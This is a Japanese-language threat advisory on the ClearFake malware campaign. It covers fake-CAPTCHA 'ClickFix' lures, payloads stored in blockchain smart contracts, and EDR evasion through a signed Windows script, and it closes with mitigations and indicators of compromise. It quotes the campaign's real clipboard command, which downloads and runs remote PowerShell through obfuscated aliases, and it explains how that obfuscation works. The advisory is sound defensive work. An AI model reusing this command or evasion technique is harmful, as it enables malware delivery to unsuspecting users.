概要:ClearFakeマルウェアの新たな脅威
「ClearFake」マルウェアキャンペーンが高度な進化を遂げ、正規のWindowsコンポーネントを悪用してエンドポイント検出システム(EDR)を迂回する新たな手口を導入しました。2025年8月以降、数百ものウェブサイトが侵害されており、この攻撃はコマンドインジェクションの脆弱性を悪用し、PowerShellコードを静かに実行します。さらに、そのインフラはブロックチェーンネットワークとコンテンツデリバリーネットワーク(CDN)上にホストされ、テイクダウンへの耐性を高めています。
ClearFakeはJavaScriptベースのマルウェア配信フレームワークで、侵害されたウェブサーバーが悪意あるコードを正規のウェブサイトに注入します。訪問者が感染ページにアクセスすると、偽のCAPTCHAチャレンジが表示され、ソーシャルエンジニアリングによってマルウェアのインストールを促します。
「ClickFix」手口による巧妙なだまし
このキャンペーンでは「ClickFix」と呼ばれる手口が用いられます。ユーザーは偽のCAPTCHAチャレンジをクリアするため、「Win + R」でWindowsの「ファイル名を指定して実行」ダイアログを開き、「Ctrl + V」で隠された悪意あるコマンドを貼り付け、Enterキーを押すよう指示されます。ユーザーが「I’m not a robot」をクリックする前に、ウェブページはすでに悪意あるPowerShellコマンドをユーザーのクリップボードにコピーしています。
ClearFakeは、ウェブサイトを大量に侵害し、そのアクセスを他の脅威アクターに販売するトラフィック配信システムとして機能しています。このビジネスモデルが、キャンペーンを通じて配信されるマルウェアファミリーの多様性を説明しています。
ブロックチェーンを活用したコマンド&コントロール基盤
最新のClearFake亜種は、BNB Smart Chainテストネット上のスマートコントラクトからペイロードを取得する多段階のJavaScript感染チェーンを利用しています。初期に侵害されたウェブページには、Base64エンコードされた難読化JavaScriptが含まれており、スマートコントラクトアドレス0xA1decFB75C8C0CA28C10517ce56B710baf727d2eからデータを取得します。この技術は「EtherHiding」として知られ、ブロックチェーンデータが不変で公開されているため、脅威アクターにテイクダウン耐性のあるインフラを提供します。
このスマートコントラクトは、任意データの保存用のset()と、保存されたペイロードの取得用のget()という2つの主要な機能を備えています。トランザクションログによると、2025年8月21日のスマートコントラクト作成以来、約149,199件のユニークなシステム識別子が送信されており、約150,000件の感染が示唆されています。感染した各システムには一意の識別子(UUID)が割り当てられ、追跡用のスマートコントラクトにアップロードされることで、既感染者への再感染が回避されます。
EDRを欺くプロキシ実行技術
このClearFakeキャンペーンにおける最も重要な進化は、エンドポイント検出および応答(EDR)ソリューションを回避するためのプロキシ実行の採用です。マルウェアは、セキュリティアラートをトリガーする可能性のあるpowershell.exeやmshta.exeを直接呼び出す代わりに、C:\Windows\System32に存在する正規のWindowsシステムファイルであるSyncAppvPublishingServer.vbsを悪用します。
クリップボードにコピーされる悪意あるコマンドは、以下のような形式です。
SyncAppvPublishingServer.vbs "n;&(gal i*x)(&(gcm *stM*) 'cdn.jsdelivr[.]net/gh/clock-cheking/expert-barnacle/load')"
SyncAppvPublishingServer.vbsはApp-V環境の同期のために設計されていますが、コマンドインジェクションの脆弱性を含んでいます。このスクリプトは、ユーザーから提供された引数を連結してPowerShellコマンドを構築します。PowerShellのステートメントがセミコロンで区切られることを利用し、攻撃者は偽のサーバー名の後に任意のコードを注入できます。
この技術の利点は、SyncAppvPublishingServer.vbsがMicrosoftによってデジタル署名された信頼できるWindowsコンポーネントであることです。また、PowerShellを隠しモード(-WindowStyle Hidden)で起動するため、悪意ある活動はユーザーからは見えません。セキュリティ製品がこの動作をブロックすると、コンポーネントの正規の機能が損なわれるため、ブロックされる可能性は低いとされています。
コマンド難読化による検出回避
PowerShellコマンド自体も複数の回避技術を使用しています。マルウェアは、容易に検出されるInvoke-ExpressionやInvoke-WebRequestのようなコマンドを使用せず、PowerShellのエイリアスとワイルドカードパターンを組み合わせます。
&(gal i*x)は、パターンi*xに一致するInvoke-Expressionのエイリアスを取得します。&(gcm *stM*)はInvoke-RestMethodに一致します。
このアプローチにより、スクリプト内の特定のコマンド名を検索するシグネチャベースの検出ルールを回避します。
軽減策
組織はClearFake攻撃を軽減するために以下の対策を講じることができます。
- Web3技術が不要な場合、ブロックチェーンネットワークとの通信に使用されるRPCエンドポイント(
bsc-testnet.drpc.orgおよびdata-seed-prebsc-1-s1.bnbchain.org)をブロックする。 SyncAppvPublishingServer.vbsの実行をブロックまたは制限するか、正規の操作に必要な特定のコマンドパラメータのみを許可リストに入れることで、プロキシ実行技術を防止する。- スクリプトに渡される引数中のセミコロンをコマンドライン検査することで、多くの悪用試行をブロックする。
- 非管理者ユーザーに対するPowerShell実行の制限は最も効果的な防御策ですが、アプリケーションの依存関係が広範なため、しばしば非現実的である。
- ユーザー教育プログラムを実施し、偽のCAPTCHAプロンプトが実行ダイアログを開いたりコマンドをペーストさせたりするような、正規のウェブサイト検証プロセスでは要求されない行為について警告する。
侵害の痕跡(IOCs)
- First stage smart contract address:
0xA1decFB75C8C0CA28C10517ce56B710baf727d2e - Second stage smart contract address:
0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff - UUID tracker smart contract address:
0xf4a32588b50a59a82fbA148d436081A48d80832A - Contract owner’s wallet address:
0xd71f4cdC84420d2bd07F50787B4F998b4c2d5290 - PowerShell payload URL:
cdn.jsdelivr[.]net/gh/clock-cheking/expert-barnacle/load